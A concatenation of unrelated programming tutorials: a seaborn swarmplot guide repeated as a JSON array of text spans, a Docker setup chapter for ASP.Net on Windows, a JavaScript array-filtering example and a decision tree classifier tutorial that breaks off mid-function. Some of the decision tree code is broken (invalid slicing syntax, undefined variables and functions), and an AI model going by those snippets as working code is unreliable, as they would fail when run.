Output: Possible values of palette are: Accent, Accent_r, Blues, Blues_r, BrBG, BrBG_r, BuGn, BuGn_r, BuPu, BuPu_r, CMRmap, CMRmap_r, Dark2, Dark2_r, GnBu, GnBu_r, Greens, Greens_r, Greys, Greys_r, OrRd, OrRd_r, Oranges, Oranges_r, PRGn, PRGn_r, Paired, Paired_r, Pastel1, Pastel1_r, Pastel2, Pastel2_r, PiYG, PiYG_r, PuBu, PuBuGn, PuBuGn_r, PuBu_r, PuOr, PuOr_r, PuRd, PuRd_r, Purples, Purples_r, RdBu, RdBu_r, RdGy, RdGy_r, RdPu, RdPu_r, RdYlBu, RdYlBu_r, RdYlGn, RdYlGn_r, Reds, Reds_r, Set1, Set1_r, Set2, Set2_r, Set3, Set3_r, Spectral, Spectral_r, Wistia, Wistia_r, YlGn, YlGnBu, YlGnBu_r, YlGn_r, YlOrBr, YlOrBr_r, YlOrRd, YlOrRd_r, afmhot, afmhot_r, autumn, autumn_r, binary, binary_r, bone, bone_r, brg, brg_r, bwr, bwr_r, cividis, cividis_r, cool, cool_r, coolwarm, coolwarm_r, copper, copper_r, cubehelix, cubehelix_r, flag, flag_r, gist_earth, gist_earth_r, gist_gray, gist_gray_r, gist_heat, gist_heat_r, gist_ncar, gist_ncar_r, gist_rainbow, gist_rainbow_r, gist_stern, 6. Plotting large points and different aesthetics With marker and alpha parameter: We will use alpha to manage transparency of the data point, and use marker for marker to customize the data point. Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x="day", y="total_bill", hue="smoker", data=tips, palette="Set2", size=20, marker="D", edgecolor="gray", alpha=.25) Output: 7. Control swarm order by passing an explicit order: Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x="time", y="tip", data=tips, order=["Dinner", "Lunch"]) Output: 8. Adding size attributes. Using size we can generate the point and we can produce points with different sizes. Syntax: seaborn.swramplot( x, y, data, size) Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x='day', y='total_bill', data=tips, hue='smoker', size=10) Output: 9. Adding the palette attributes: Using the palette we can generate the point with different colors. In this below example we can see the palette can be responsible for a generate the swramplot with different colormap values. Syntax: seaborn.swramplot( x, y, data, palette=”color_name”) Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x='day', y='total_bill', data=tips, hue='time', palette='pastel') Output: kumar_satyam Python-Seaborn Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 52, "s": 24, "text": "\n06 Nov, 2020" }, { "code": null, "e": 355, "s": 52, "text": "Seaborn is an amazing visualization library for statistical graphics plotting in Python. It provides beautiful default styles and color palettes to make statistical plots more attractive. It is built on the top of the matplotlib library and also closely integrated into the data structures from pandas." }, { "code": null, "e": 762, "s": 355, "text": "Seaborn swarmplot is probably similar to stripplot, only the points are adjusted so it won’t get overlap to each other as it helps to represent the better representation of the distribution of values. A swarm plot can be drawn on its own, but it is also a good complement to a box, preferable because the associated names will be used to annotate the axes. This type of plot sometimes known as “beeswarm”. " }, { "code": null, "e": 964, "s": 762, "text": "Syntax: seaborn.swarmplot(x=None, y=None, hue=None, data=None, order=None, hue_order=None, dodge=False, orient=None, color=None, palette=None, size=5, edgecolor=’gray’, linewidth=0, ax=None, **kwargs) " }, { "code": null, "e": 1129, "s": 964, "text": "Parameters: x, y, hue: Inputs for plotting long-form data. data: Dataset for plotting. color: Color for all of the elements size: Radius of the markers, in points. " }, { "code": null, "e": 1198, "s": 1129, "text": "Example 1: Basic visualization of “fmri” dataset using swarmplot() " }, { "code": null, "e": 1206, "s": 1198, "text": "Python3" }, { "code": "import seaborn seaborn.set(style='whitegrid')fmri = seaborn.load_dataset(\"fmri\") seaborn.swarmplot(x=\"timepoint\", y=\"signal\", data=fmri)", "e": 1378, "s": 1206, "text": null }, { "code": null, "e": 1387, "s": 1378, "text": "Output: " }, { "code": null, "e": 1471, "s": 1387, "text": "Example 2: Grouping data points on the basis of category, here as region and event." }, { "code": null, "e": 1479, "s": 1471, "text": "Python3" }, { "code": "import seaborn seaborn.set(style='whitegrid')fmri = seaborn.load_dataset(\"fmri\") seaborn.swarmplot(x=\"timepoint\", y=\"signal\", hue=\"region\", data=fmri)", "e": 1682, "s": 1479, "text": null }, { "code": null, "e": 1690, "s": 1682, "text": "Output:" }, { "code": null, "e": 1757, "s": 1690, "text": "Example 3: Basic visualization of “tips” dataset using swarmplot()" }, { "code": null, "e": 1765, "s": 1757, "text": "Python3" }, { "code": "import seaborn seaborn.set(style='whitegrid')tip = seaborn.load_dataset('tips') seaborn.swarmplot(x='day', y='tip', data=tip)", "e": 1892, "s": 1765, "text": null }, { "code": null, "e": 1900, "s": 1892, "text": "Output:" }, { "code": null, "e": 1960, "s": 1900, "text": "1. Draw a single horizontal swarm plot using only one axis:" }, { "code": null, "e": 2100, "s": 1960, "text": "If we use only one data variable instead of two data variables then it means that the axis denotes each of these data variables as an axis." }, { "code": null, "e": 2143, "s": 2100, "text": "X denotes an x-axis and y denote a y-axis." }, { "code": null, "e": 2152, "s": 2143, "text": "Syntax: " }, { "code": null, "e": 2174, "s": 2152, "text": "seaborn.swarmplot(x)\n" }, { "code": null, "e": 2182, "s": 2174, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=tips[\"total_bill\"])", "e": 2477, "s": 2182, "text": null }, { "code": null, "e": 2485, "s": 2477, "text": "Output:" }, { "code": null, "e": 2512, "s": 2485, "text": "2. Draw horizontal swarms:" }, { "code": null, "e": 2684, "s": 2512, "text": "In the above example we see how to plot single horizontal swarm plot and here can perform multiple horizontal swarm plot with exchange the data variable with another axis." }, { "code": null, "e": 2692, "s": 2684, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"total_bill\", y=\"day\", data=tips)", "e": 3001, "s": 2692, "text": null }, { "code": null, "e": 3009, "s": 3001, "text": "Output:" }, { "code": null, "e": 3033, "s": 3009, "text": "3. Using hue parameter:" }, { "code": null, "e": 3178, "s": 3033, "text": "While the points are plotted in two dimensions, another dimension can be added to the plot by coloring the points according to a third variable." }, { "code": null, "e": 3186, "s": 3178, "text": "Syntax:" }, { "code": null, "e": 3218, "s": 3186, "text": "sns.swarmplot(x, y, hue, data);" }, { "code": null, "e": 3226, "s": 3218, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", hue=\"time\", data=tips)", "e": 3547, "s": 3226, "text": null }, { "code": null, "e": 3555, "s": 3547, "text": "Output:" }, { "code": null, "e": 3612, "s": 3555, "text": "4. Draw outlines around the data points using linewidth:" }, { "code": null, "e": 3746, "s": 3612, "text": "Width of the gray lines that frame the plot elements. Whenever we increase linewidth than the point also will increase automatically." }, { "code": null, "e": 3754, "s": 3746, "text": "Syntax:" }, { "code": null, "e": 3795, "s": 3754, "text": "seaborn.swarmplot(x, y, data, linewidth)" }, { "code": null, "e": 3803, "s": 3795, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", data=tips, linewidth=2)", "e": 4143, "s": 3803, "text": null }, { "code": null, "e": 4151, "s": 4143, "text": "Output:" }, { "code": null, "e": 4191, "s": 4151, "text": "We can change the color with edgecolor:" }, { "code": null, "e": 4199, "s": 4191, "text": "Python3" }, { "code": "seaborn.swarmplot(y=\"total_bill\", x=\"day\", data=tips, linewidth=2,edgecolor='green')", "e": 4302, "s": 4199, "text": null }, { "code": null, "e": 4310, "s": 4302, "text": "Output:" }, { "code": null, "e": 4403, "s": 4310, "text": "5. Draw each level of the hue variable at different locations on the major categorical axis:" }, { "code": null, "e": 4599, "s": 4403, "text": "When using hue nesting, setting dodge should be True will separate the point for different hue levels along the categorical axis. And Palette is used for the different levels of the hue variable." }, { "code": null, "e": 4607, "s": 4599, "text": "Syntax:" }, { "code": null, "e": 4658, "s": 4607, "text": "seaborn.stripplot(x, y, data, hue, palette, dodge)" }, { "code": null, "e": 4666, "s": 4658, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", hue=\"smoker\", data=tips, palette=\"Set2\", dodge=True)", "e": 5035, "s": 4666, "text": null }, { "code": null, "e": 5043, "s": 5035, "text": "Output:" }, { "code": null, "e": 5075, "s": 5043, "text": "Possible values of palette are:" }, { "code": null, "e": 5185, "s": 5075, "text": "Accent, Accent_r, Blues, Blues_r, BrBG, BrBG_r, BuGn, BuGn_r, BuPu, BuPu_r, CMRmap, CMRmap_r, Dark2, Dark2_r," }, { "code": null, "e": 5299, "s": 5185, "text": "GnBu, GnBu_r, Greens, Greens_r, Greys, Greys_r, OrRd, OrRd_r, Oranges, Oranges_r, PRGn, PRGn_r, Paired, Paired_r," }, { "code": null, "e": 5413, "s": 5299, "text": "Pastel1, Pastel1_r, Pastel2, Pastel2_r, PiYG, PiYG_r, PuBu, PuBuGn, PuBuGn_r, PuBu_r, PuOr, PuOr_r, PuRd, PuRd_r," }, { "code": null, "e": 5531, "s": 5413, "text": "Purples, Purples_r, RdBu, RdBu_r, RdGy, RdGy_r, RdPu, RdPu_r, RdYlBu, RdYlBu_r, RdYlGn, RdYlGn_r, Reds, Reds_r, Set1," }, { "code": null, "e": 5647, "s": 5531, "text": "Set1_r, Set2, Set2_r, Set3, Set3_r, Spectral, Spectral_r, Wistia, Wistia_r, YlGn, YlGnBu, YlGnBu_r, YlGn_r, YlOrBr," }, { "code": null, "e": 5767, "s": 5647, "text": "YlOrBr_r, YlOrRd, YlOrRd_r, afmhot, afmhot_r, autumn, autumn_r, binary, binary_r, bone, bone_r, brg, brg_r, bwr, bwr_r," }, { "code": null, "e": 5891, "s": 5767, "text": "cividis, cividis_r, cool, cool_r, coolwarm, coolwarm_r, copper, copper_r, cubehelix, cubehelix_r, flag, flag_r, gist_earth," }, { "code": null, "e": 6020, "s": 5891, "text": "gist_earth_r, gist_gray, gist_gray_r, gist_heat, gist_heat_r, gist_ncar, gist_ncar_r, gist_rainbow, gist_rainbow_r, gist_stern, " }, { "code": null, "e": 6103, "s": 6020, "text": "6. Plotting large points and different aesthetics With marker and alpha parameter:" }, { "code": null, "e": 6219, "s": 6103, "text": "We will use alpha to manage transparency of the data point, and use marker for marker to customize the data point. " }, { "code": null, "e": 6227, "s": 6219, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"day\", y=\"total_bill\", hue=\"smoker\", data=tips, palette=\"Set2\", size=20, marker=\"D\", edgecolor=\"gray\", alpha=.25)", "e": 6652, "s": 6227, "text": null }, { "code": null, "e": 6660, "s": 6652, "text": "Output:" }, { "code": null, "e": 6713, "s": 6660, "text": "7. Control swarm order by passing an explicit order:" }, { "code": null, "e": 6721, "s": 6713, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x=\"time\", y=\"tip\", data=tips, order=[\"Dinner\", \"Lunch\"])", "e": 7069, "s": 6721, "text": null }, { "code": null, "e": 7077, "s": 7069, "text": "Output:" }, { "code": null, "e": 7104, "s": 7077, "text": "8. Adding size attributes." }, { "code": null, "e": 7189, "s": 7104, "text": "Using size we can generate the point and we can produce points with different sizes." }, { "code": null, "e": 7197, "s": 7189, "text": "Syntax:" }, { "code": null, "e": 7234, "s": 7197, "text": "seaborn.swramplot( x, y, data, size)" }, { "code": null, "e": 7242, "s": 7234, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x='day', y='total_bill', data=tips, hue='smoker', size=10)", "e": 7590, "s": 7242, "text": null }, { "code": null, "e": 7598, "s": 7590, "text": "Output:" }, { "code": null, "e": 7632, "s": 7598, "text": "9. Adding the palette attributes:" }, { "code": null, "e": 7824, "s": 7632, "text": "Using the palette we can generate the point with different colors. In this below example we can see the palette can be responsible for a generate the swramplot with different colormap values." }, { "code": null, "e": 7832, "s": 7824, "text": "Syntax:" }, { "code": null, "e": 7885, "s": 7832, "text": "seaborn.swramplot( x, y, data, palette=”color_name”)" }, { "code": null, "e": 7893, "s": 7885, "text": "Python3" }, { "code": "# Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style=\"whitegrid\") # loading data-settips = seaborn.load_dataset(\"tips\") seaborn.swarmplot(x='day', y='total_bill', data=tips, hue='time', palette='pastel')", "e": 8248, "s": 7893, "text": null }, { "code": null, "e": 8256, "s": 8248, "text": "Output:" }, { "code": null, "e": 8269, "s": 8256, "text": "kumar_satyam" }, { "code": null, "e": 8284, "s": 8269, "text": "Python-Seaborn" }, { "code": null, "e": 8291, "s": 8284, "text": "Python" } ]
Docker - Setting ASP.Net
ASP.Net is the standard web development framework that is provided by Microsoft for developing server-side applications. Since ASP.Net has been around for quite a long time for development, Docker has ensured that it has support for ASP.Net. In this chapter, we will see the various steps for getting the Docker container for ASP.Net up and running. The following steps need to be carried out first for running ASP.Net. Step 1 − Since this can only run on Windows systems, you first need to ensure that you have either Windows 10 or Window Server 2016. Step 2 − Next, ensure that Hyper-V is and Containers are installed on the Windows system. To install Hyper–V and Containers, you can go to Turn Windows Features ON or OFF. Then ensure the Hyper-V option and Containers is checked and click the OK button. The system might require a restart after this operation. Step 3 − Next, you need to use the following Powershell command to install the 1.13.0rc4 version of Docker. The following command will download this and store it in the temp location. Invoke-WebRequest "https://test.docker.com/builds/Windows/x86_64/docker-1.13.0- rc4.zip" -OutFile "$env:TEMP\docker-1.13.0-rc4.zip" –UseBasicParsing Step 4 − Next, you need to expand the archive using the following powershell command. Expand-Archive -Path "$env:TEMP\docker-1.13.0-rc4.zip" -DestinationPath $env:ProgramFiles Step 5 − Next, you need to add the Docker Files to the environment variable using the following powershell command. $env:path += ";$env:ProgramFiles\Docker" Step 6 − Next, you need to register the Docker Daemon Service using the following powershell command. dockerd --register-service Step 7 − Finally, you can start the docker daemon using the following command. Start-Service Docker Use the docker version command in powershell to verify that the docker daemon is working Let’s see how to install the ASP.Net container. Step 1 − The first step is to pull the image from Docker Hub. When you log into Docker Hub, you will be able to search and see the image for Microsoft/aspnet as shown below. Just type in asp in the search box and click on the Microsoft/aspnet link which comes up in the search results. Step 2 − You will see that the Docker pull command for ASP.Net in the details of the repository in Docker Hub. Step 3 − Go to Docker Host and run the Docker pull command for the microsoft/aspnet image. Note that the image is pretty large, somewhere close to 4.2 GB. Step 4 − Now go to the following location https://github.com/Microsoft/aspnet-docker and download the entire Git repository. Step 5 − Create a folder called App in your C drive. Then copy the contents from the 4.6.2/sample folder to your C drive. Go the Docker File in the sample directory and issue the following command − docker build –t aspnet-site-new –build-arg site_root=/ The following points need to be noted about the above command − It builds a new image called aspnet-site-new from the Docker File. The root path is set to the localpath folder. Step 6 − Now it’s time to run the container. It can be done using the following command − docker run –d –p 8000:80 –name my-running-site-new aspnet-site-new Step 7 − You will now have IIS running in the Docker container. To find the IP Address of the Docker container, you can issue the Docker inspect command as shown below. 70 Lectures 12 hours Anshul Chauhan 41 Lectures 5 hours AR Shankar 31 Lectures 3 hours Abhilash Nelson 15 Lectures 2 hours Harshit Srivastava, Pranjal Srivastava 33 Lectures 4 hours Mumshad Mannambeth 13 Lectures 53 mins Musab Zayadneh Print Add Notes Bookmark this page
[ { "code": null, "e": 2582, "s": 2340, "text": "ASP.Net is the standard web development framework that is provided by Microsoft for developing server-side applications. Since ASP.Net has been around for quite a long time for development, Docker has ensured that it has support for ASP.Net." }, { "code": null, "e": 2690, "s": 2582, "text": "In this chapter, we will see the various steps for getting the Docker container for ASP.Net up and running." }, { "code": null, "e": 2760, "s": 2690, "text": "The following steps need to be carried out first for running ASP.Net." }, { "code": null, "e": 2893, "s": 2760, "text": "Step 1 − Since this can only run on Windows systems, you first need to ensure that you have either Windows 10 or Window Server 2016." }, { "code": null, "e": 3147, "s": 2893, "text": "Step 2 − Next, ensure that Hyper-V is and Containers are installed on the Windows system. To install Hyper–V and Containers, you can go to Turn Windows Features ON or OFF. Then ensure the Hyper-V option and Containers is checked and click the OK button." }, { "code": null, "e": 3204, "s": 3147, "text": "The system might require a restart after this operation." }, { "code": null, "e": 3388, "s": 3204, "text": "Step 3 − Next, you need to use the following Powershell command to install the 1.13.0rc4 version of Docker. The following command will download this and store it in the temp location." }, { "code": null, "e": 3542, "s": 3388, "text": "Invoke-WebRequest \"https://test.docker.com/builds/Windows/x86_64/docker-1.13.0-\n rc4.zip\" -OutFile \"$env:TEMP\\docker-1.13.0-rc4.zip\" –UseBasicParsing \n" }, { "code": null, "e": 3628, "s": 3542, "text": "Step 4 − Next, you need to expand the archive using the following powershell command." }, { "code": null, "e": 3719, "s": 3628, "text": "Expand-Archive -Path \"$env:TEMP\\docker-1.13.0-rc4.zip\" -DestinationPath $env:ProgramFiles\n" }, { "code": null, "e": 3835, "s": 3719, "text": "Step 5 − Next, you need to add the Docker Files to the environment variable using the following powershell command." }, { "code": null, "e": 3878, "s": 3835, "text": "$env:path += \";$env:ProgramFiles\\Docker\" \n" }, { "code": null, "e": 3980, "s": 3878, "text": "Step 6 − Next, you need to register the Docker Daemon Service using the following powershell command." }, { "code": null, "e": 4009, "s": 3980, "text": "dockerd --register-service \n" }, { "code": null, "e": 4088, "s": 4009, "text": "Step 7 − Finally, you can start the docker daemon using the following command." }, { "code": null, "e": 4110, "s": 4088, "text": "Start-Service Docker\n" }, { "code": null, "e": 4199, "s": 4110, "text": "Use the docker version command in powershell to verify that the docker daemon is working" }, { "code": null, "e": 4247, "s": 4199, "text": "Let’s see how to install the ASP.Net container." }, { "code": null, "e": 4533, "s": 4247, "text": "Step 1 − The first step is to pull the image from Docker Hub. When you log into Docker Hub, you will be able to search and see the image for Microsoft/aspnet as shown below. Just type in asp in the search box and click on the Microsoft/aspnet link which comes up in the search results." }, { "code": null, "e": 4644, "s": 4533, "text": "Step 2 − You will see that the Docker pull command for ASP.Net in the details of the repository in Docker Hub." }, { "code": null, "e": 4799, "s": 4644, "text": "Step 3 − Go to Docker Host and run the Docker pull command for the microsoft/aspnet image. Note that the image is pretty large, somewhere close to 4.2 GB." }, { "code": null, "e": 4924, "s": 4799, "text": "Step 4 − Now go to the following location https://github.com/Microsoft/aspnet-docker and download the entire Git repository." }, { "code": null, "e": 5123, "s": 4924, "text": "Step 5 − Create a folder called App in your C drive. Then copy the contents from the 4.6.2/sample folder to your C drive. Go the Docker File in the sample directory and issue the following command −" }, { "code": null, "e": 5180, "s": 5123, "text": "docker build –t aspnet-site-new –build-arg site_root=/ \n" }, { "code": null, "e": 5244, "s": 5180, "text": "The following points need to be noted about the above command −" }, { "code": null, "e": 5311, "s": 5244, "text": "It builds a new image called aspnet-site-new from the Docker File." }, { "code": null, "e": 5357, "s": 5311, "text": "The root path is set to the localpath folder." }, { "code": null, "e": 5447, "s": 5357, "text": "Step 6 − Now it’s time to run the container. It can be done using the following command −" }, { "code": null, "e": 5516, "s": 5447, "text": "docker run –d –p 8000:80 –name my-running-site-new aspnet-site-new \n" }, { "code": null, "e": 5685, "s": 5516, "text": "Step 7 − You will now have IIS running in the Docker container. To find the IP Address of the Docker container, you can issue the Docker inspect command as shown below." }, { "code": null, "e": 5719, "s": 5685, "text": "\n 70 Lectures \n 12 hours \n" }, { "code": null, "e": 5735, "s": 5719, "text": " Anshul Chauhan" }, { "code": null, "e": 5768, "s": 5735, "text": "\n 41 Lectures \n 5 hours \n" }, { "code": null, "e": 5780, "s": 5768, "text": " AR Shankar" }, { "code": null, "e": 5813, "s": 5780, "text": "\n 31 Lectures \n 3 hours \n" }, { "code": null, "e": 5830, "s": 5813, "text": " Abhilash Nelson" }, { "code": null, "e": 5863, "s": 5830, "text": "\n 15 Lectures \n 2 hours \n" }, { "code": null, "e": 5903, "s": 5863, "text": " Harshit Srivastava, Pranjal Srivastava" }, { "code": null, "e": 5936, "s": 5903, "text": "\n 33 Lectures \n 4 hours \n" }, { "code": null, "e": 5956, "s": 5936, "text": " Mumshad Mannambeth" }, { "code": null, "e": 5988, "s": 5956, "text": "\n 13 Lectures \n 53 mins\n" }, { "code": null, "e": 6004, "s": 5988, "text": " Musab Zayadneh" }, { "code": null, "e": 6011, "s": 6004, "text": " Print" }, { "code": null, "e": 6022, "s": 6011, "text": " Add Notes" } ]
Array filtering using first string letter in JavaScript
Suppose we have an array that contains name of some people like this: const arr = ['Amy','Dolly','Jason','Madison','Patricia']; We are required to write a JavaScript function that takes in one such string as the first argument, and two lowercase alphabet characters as second and third argument. Then, our function should filter the array to contain only those elements that start with the alphabets that fall within the range specified by the second and third argument. Therefore, if the second and third argument are 'a' and 'j' respectively, then the output should be − const output = ['Amy','Dolly','Jason']; Let us write the code − const arr = ['Amy','Dolly','Jason','Madison','Patricia']; const filterByAlphaRange = (arr = [], start = 'a', end = 'z') => { const isGreater = (c1, c2) => c1 >= c2; const isSmaller = (c1, c2) => c1 <= c2; const filtered = arr.filter(el => { const [firstChar] = el.toLowerCase(); return isGreater(firstChar, start) && isSmaller(firstChar, end); }); return filtered; }; console.log(filterByAlphaRange(arr, 'a', 'j')); And the output in the console will be − [ 'Amy', 'Dolly', 'Jason' ]
[ { "code": null, "e": 1132, "s": 1062, "text": "Suppose we have an array that contains name of some people like this:" }, { "code": null, "e": 1190, "s": 1132, "text": "const arr = ['Amy','Dolly','Jason','Madison','Patricia'];" }, { "code": null, "e": 1533, "s": 1190, "text": "We are required to write a JavaScript function that takes in one such string as the first argument, and two lowercase alphabet characters as second and third argument. Then, our function should filter the array to contain only those elements that start with the alphabets that fall within the range specified by the second and third argument." }, { "code": null, "e": 1635, "s": 1533, "text": "Therefore, if the second and third argument are 'a' and 'j' respectively, then the output should be −" }, { "code": null, "e": 1675, "s": 1635, "text": "const output = ['Amy','Dolly','Jason'];" }, { "code": null, "e": 1699, "s": 1675, "text": "Let us write the code −" }, { "code": null, "e": 2142, "s": 1699, "text": "const arr = ['Amy','Dolly','Jason','Madison','Patricia'];\nconst filterByAlphaRange = (arr = [], start = 'a', end = 'z') => {\n const isGreater = (c1, c2) => c1 >= c2;\n const isSmaller = (c1, c2) => c1 <= c2;\n const filtered = arr.filter(el => {\n const [firstChar] = el.toLowerCase();\n return isGreater(firstChar, start) && isSmaller(firstChar, end);\n });\n return filtered;\n};\nconsole.log(filterByAlphaRange(arr, 'a', 'j'));" }, { "code": null, "e": 2182, "s": 2142, "text": "And the output in the console will be −" }, { "code": null, "e": 2210, "s": 2182, "text": "[ 'Amy', 'Dolly', 'Jason' ]" } ]
Decision Tree Classifier from Scratch: Classifying Student’s Knowledge Level | by Anish Shrestha | Towards Data Science
You need to have basic knowledge in: Python programming languageNumpy (Library for scientific computing)Pandas Python programming language Numpy (Library for scientific computing) Pandas The data set I am going to use in this project has been sourced from the Machine Learning Repository of the University of California, Irvine User Knowledge Modeling Data Set (UC Irvine). The UCI page mentions the following publication as the original source of the data set: H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain dependent data in web, Knowledge Based Systems, vol. 37, pp. 283–295, 2013 In simple words, a Decision Tree Classifier is a Supervised Machine learning algorithm that is used for supervised + classification problems. Under the hood in the decision tree, each node asks a True or False question about one of the features and moves left or right with respect to the decision. You can learn more about Decision Tree from here. We are going to use Machine Learning algorithms to find the patterns on the historical data of the students and classify their knowledge level, and for that, we are going to write our own simple Decision Tree Classifier from scratch by using Python Programming Language. Though i am going to explain everything along the way, it will not be a basic level explanation. I will highlight the important concepts with further links so that everyone can explore more on that topic. We are going to use pandas for data processing and data cleaning. import pandas as pddf = pd.read_csv('data.csv')df.head() First off, we are importing the data.csv file then processing it as a panda’s data frame and taking a peek at the data. As we can see our data has 6 columns. It contains 5 features and 1 label. Since this data is already cleaned, there is no need for data cleaning and wrangling. But while working with other real-world datasets it is important to check for null values and outliers in the dataset and engineer the best features out of it. train = df.values[-:20]test = df.values[-20:] here we split our data into train and test where the last 20 data of our dataset are test data and the rest are train data. Now it’s time to write our Decision Tree Classifier. But before diving into code there are few things to learn: To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. You can learn more about them from here.CART stands for Classification and Regression Trees. CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or in simple words CARD uses Gini as its cost function to evaluate the error.Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when.To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty and we use this to select the best question to ask and given that question, we recursively build tree nodes. We then further continue dividing the node until there are no questions to ask and we denote that last node as a leaf. To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. You can learn more about them from here. CART stands for Classification and Regression Trees. CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or in simple words CARD uses Gini as its cost function to evaluate the error. Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when. To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty and we use this to select the best question to ask and given that question, we recursively build tree nodes. We then further continue dividing the node until there are no questions to ask and we denote that last node as a leaf. To implement the Decision Tree Classifier we need to know what question to ask about the data and when. Let's write a code for that: class CreateQuestion: def __init__(self, column, value): self.column = column self.value = value def check(self, data): val = data[self.column] return val >= self.value def __repr__(self): return "Is %s %s %s?" % ( self.column[-1], ">=", str(self.value)) Above we’ve written a CreateQuestion class that takes 2 inputs: column number and value as an instance variable. It has a check method which is used to compare the feature value. __repr__ is just a python’s magic function to help display the question. Let's see it in action: q = CreateQuestion(0, 0.08) now let's check if our check method is working fine or not: data = train[0]q.check(data) as we can see we’ve got a False value. Since our 0th value in the train set is 0.0 which is not greater than or equals to 0.08, our method is working fine. Now it’s time to create a partition function that helps us to partition our data into two subsets: The first set contains all the data which is True and the second contains False. Let's write a code for this: def partition(rows, qsn): true_rows, false_rows = [], [] for row in rows: if qsn.check(row): true_rows.append(row) else: false_rows.append(row) return true_rows, false_rows our partition function takes two inputs: rows and a question then returns a list of true rows and false rows. Let's see this in action as well: true_rows, false_rows = partition(train, CreateQuestion(0, 0.08)) here true_rows contains all the data grater or equal to 0.08 and false_rows contains data less than 0.08. Now it’s time to write our Gini Impurity algorithm. As we’ve discussed earlier, it helps us to quantify how much uncertainty there is in the node, and Information Gain lets us quantify how much a question reduces that uncertainty. Impurity metrics range between 0 and 1 where a lower value indicates less uncertainty. def gini(rows): counts = class_count(rows) impurity = 1 for label in counts: probab_of_label = counts[label] / float(len(rows)) impurity -= probab_of_label**2 return impurity In our gini function, we have just implemented the formula for Gini. It returns the impurity value of given rows. counts variable holds the dictionary with total counts of the given value in the dataset. class_counts is a helper function to count a total number of data present in a dataset of a certain class. def class_counts(rows): for row in rows: label = row[-1] if label not in counts: counts[label] = 0 counts[label] += 1 return counts Let's see gini in action: As you can see in image 1 there is some impurity so it returns 0.5 and in image 2 there are no impurities so it returns 0. Now we are going to write code for calculating information gain: def info_gain(left, right, current_uncertainty): p = float(len(left)) / (len(left) + len(right)) return current_uncertainty - p * gini(left) \ - (1 - p) * gini(right) Information gain is calculated by subtracting the uncertainty starting node with a weighted impurity of two child nodes. Now it's time to put everything together. def find_best_split(rows): best_gain = 0 best_question = None current_uncertainty = gini(rows) n_features = len(rows[0]) - 1 for col in range(n_features): values = set([row[col] for row in rows]) for val in values: question = Question(col, val) true_rows, false_rows = partition(rows, question) if len(true_rows) == 0 or len(false_rows) == 0: continue gain = info_gain(true_rows, false_rows,\ current_uncertainty) if gain > best_gain: best_gain, best_question = gain, question return best_gain, best_question We have written a find_best_split function which finds the best question by iterating over every feature and labels then calculates the information gain. Let's see this function in action: best_gain, best_question = find_best_split(train) We are now going to write our fit function. def fit(features, labels): data = features + labels gain, question = find_best_split(data) if gain == 0: return Leaf(rows) true_rows, false_rows = partition(rows, question) # Recursively build the true branch. true_branch = build_tree(true_rows) # Recursively build the false branch. false_branch = 